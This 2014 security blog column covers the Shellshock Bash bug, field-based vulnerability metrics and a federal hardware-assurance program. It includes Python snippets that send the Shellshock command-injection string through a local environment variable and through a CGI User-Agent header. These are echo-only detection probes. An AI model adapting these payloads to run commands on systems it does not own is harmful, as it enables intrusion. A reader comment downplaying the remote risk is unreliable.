CyberEye

What gives? Shellshock fails to shock

What a difference a few months can make. Shortly after the Heartbleed bug caused a panic in security circles, along comes something that could be even more serious, and the reaction seems to be one big yawn.

The so-called Shellshock vulnerability is in the GNU Bourne-Again Shell (Bash), the command-line shell used in Linux and Unix operating systems as well as Apple’s Unix-based Mac OS X. The flaw lies in the way Bash parses function definitions passed in through environment variables, and it could allow an attacker to execute arbitrary shell commands and insert malware into systems.
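
The bug is easy to demonstrate locally. Below is a minimal sketch in Python that wraps the widely circulated test string for CVE-2014-6271; the function name, variable name and "VULNERABLE" marker are illustrative, and a patched Bash will print only "ok".

```python
# Minimal local check for the original Shellshock bug (CVE-2014-6271),
# using the widely published probe string. Illustrative only: the
# environment variable name and the VULNERABLE marker are arbitrary.
import subprocess

def bash_is_vulnerable(bash_path="/bin/bash"):
    # The value begins with "() {", which vulnerable Bash versions parse
    # as an exported function definition, and then keep executing
    # whatever trails the closing brace when the shell starts up.
    env = {"probe": "() { :; }; echo VULNERABLE"}
    out = subprocess.run([bash_path, "-c", "echo ok"],
                         env=env, capture_output=True, text=True).stdout
    return "VULNERABLE" in out

if __name__ == "__main__":
    print("vulnerable" if bash_is_vulnerable() else "patched (or not bash)")
```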

This is not a vulnerability in concept only. Trend Micro, which has been looking for threats based on Shellshock, has already identified a slew of them and says the bug can be reached over common communications protocols such as HTTP, SMTP, SSH and FTP, wherever a service passes attacker-supplied data to Bash.
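
The best-documented remote vector shows why those protocols matter: CGI web servers copy request headers such as User-Agent into environment variables (HTTP_USER_AGENT, for example) before spawning a handler, so a crafted header becomes a crafted variable that reaches any Bash the handler invokes. Below is a hedged sketch of what such a probe looks like; the URL and marker string are hypothetical, and a check like this belongs only on servers you administer.

```python
# Illustrative Shellshock probe against a CGI endpoint. The server copies
# the User-Agent header into the HTTP_USER_AGENT environment variable
# before running the handler, which is how the crafted string reaches
# Bash. The target URL is hypothetical; probe only hosts you own.
import urllib.request

PROBE = "() { :; }; echo; echo SHELLSHOCKED"  # marker a vulnerable host echoes back

def probe_cgi(url="http://scanme.internal/cgi-bin/status.sh"):
    req = urllib.request.Request(url, headers={"User-Agent": PROBE})
    with urllib.request.urlopen(req, timeout=5) as resp:
        return "SHELLSHOCKED" in resp.read().decode(errors="replace")
```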

Shellshock compounds the threat already posed by the OpenSSL Heartbleed bug, and the two have much in common. Servers that host OpenVPN, a widely used application, are reportedly vulnerable to Shellshock just as they were to Heartbleed, and other security researchers have reported working exploits. The two bugs also come from similar development stock: both are faults in code written long ago that went unnoticed, apparently for more than 20 years in the case of Shellshock. The developers simply didn’t anticipate the kinds of attacks today’s threat environment can mount, and that has brought the rigor of open source development into question.

Patches are being rushed out to cope with Shellshock, just as they were with Heartbleed, though security organizations have warned that the initial fixes don’t completely resolve the vulnerability. And in any case, patches only help if people apply them: months after the Heartbleed bug was trumpeted in the headlines, critical systems around the world were still at risk.

Not all vulnerabilities are equal

Then again, perhaps organizations aren’t as vulnerable to Heartbleed, Shellshock and similar code-driven bugs as people think. University and industry researchers have argued in a recent paper that existing security metrics don’t capture the extent to which disclosed vulnerabilities are actually exploited.

The researchers developed several new metrics derived from actual field data and evaluated them against some 300 million intrusion reports from more than 6 million hosts. They found that none of the products in their study had more than 35 percent of its disclosed vulnerabilities exploited in the wild, and that across all the products combined, only 15 percent of vulnerabilities were exploited.

“Furthermore,” the authors wrote, “the exploitation ratio and the exercised attack surface tend to decrease with newer product releases [and that] hosts that quickly upgrade to newer product versions tend to have reduced exercised attack surfaces.”

In all, they propose four new metrics that, they claim, complement existing ones by measuring systems that are already deployed and working in real-world environments (a rough sketch of how they might be computed follows the list):

  • A count of a product’s vulnerabilities that are exploited in the wild.
  • The exploitation ratio, or the share of a product’s disclosed vulnerabilities that are exploited over time.
  • A product’s attack volume, or how frequently it’s attacked.
  • The exercised attack surface, or the portion of a product’s vulnerabilities that are attacked in a given month.
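
To make the definitions concrete, here is a rough sketch of how the four metrics might be computed. The record format, product name and CVE identifiers are all invented for illustration; the paper derives its numbers from telemetry collected on millions of real hosts.

```python
# Hypothetical field data: (product, vulnerability ID, month attack observed).
field_attacks = [
    ("ProductA", "CVE-2014-0001", "2014-01"),
    ("ProductA", "CVE-2014-0001", "2014-02"),
    ("ProductA", "CVE-2014-0002", "2014-02"),
]
# Vulnerabilities publicly disclosed for each product.
disclosed = {"ProductA": {"CVE-2014-0001", "CVE-2014-0002", "CVE-2014-0003"}}

def field_metrics(product, month):
    attacks = [r for r in field_attacks if r[0] == product]
    exploited = {cve for _, cve, _ in attacks}
    in_month = {cve for _, cve, m in attacks if m == month}
    return {
        # 1. Count of the product's vulnerabilities exploited in the wild.
        "exploited_count": len(exploited),
        # 2. Exploitation ratio: exploited vulnerabilities over disclosed ones.
        "exploitation_ratio": len(exploited) / len(disclosed[product]),
        # 3. Attack volume: how frequently the product is attacked.
        "attack_volume": len(attacks),
        # 4. Exercised attack surface: share of disclosed vulnerabilities
        #    attacked in the given month.
        "exercised_surface": len(in_month) / len(disclosed[product]),
    }

print(field_metrics("ProductA", "2014-02"))
# -> exploited_count 2, exploitation_ratio 2/3, attack_volume 3,
#    exercised_surface 2/3
```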

These metrics, they say, could be used as part of a quantitative assessment of cyber risks and can inform the design of future security technologies.

Don’t forget the hardware

Then again, what’s the use of vulnerability announcements and security metrics, all aimed at revealing software bugs and fixes, if the hardware that hosts the software is compromised?

In times past, when chips and the systems that use them were all manufactured in the United States or by trusted allies, that wasn’t such a concern. But globalization has diversified manufacturing to China and other countries, raising fears that adversaries could tamper with hardware components to make U.S. systems easier to attack.

That’s been the impetus behind several trusted computing initiatives in the past few years. Most recently, the National Institute of Standards and Technology developed its Systems Security Engineering initiative to guide the building of trustworthy systems.

The National Science Foundation is now in the game through the government’s Secure, Trustworthy, Assured and Resilient Semiconductors and Systems (STARSS) program, run in concert with the Semiconductor Research Corporation (SRC). Its approach is to develop tools and techniques that assure the security of components from the design stage through manufacturing.

Nine initial research awards were recently made under this program, which is part of the NSF’s $75 million “game changing” Secure and Trustworthy Cyberspace effort.

While all of this is pretty broad-based, the ultimate result for government agencies could be that, in just a few years, they will be able to specify in their procurements exactly what assured hardware the computing systems they buy need to contain. 

Posted by Brian Robinson on Oct 10, 2014 at 11:52 AM


Reader Comments

Tue, Oct 14, 2014 Mike Wilsher

A big yawn is right. An attacker first has to breach whatever defenses a system has: firewalls, hardening and so on. The attacker must hit a weak point, generally through some other vulnerability, and could perhaps get to the shell, provided there are no further roadblocks. And the default shell on Linux, UNIX or a UNIX variant is not necessarily bash; sh, csh and ksh have been popular alternatives as defaults. Yawn, yes. Patch? Yes, definitely, it should be done: recompile bash with the patch code (old school), easy enough to do, or replace bash as the operable shell until bash is fixed, if your vendor doesn’t have a fix out just yet.
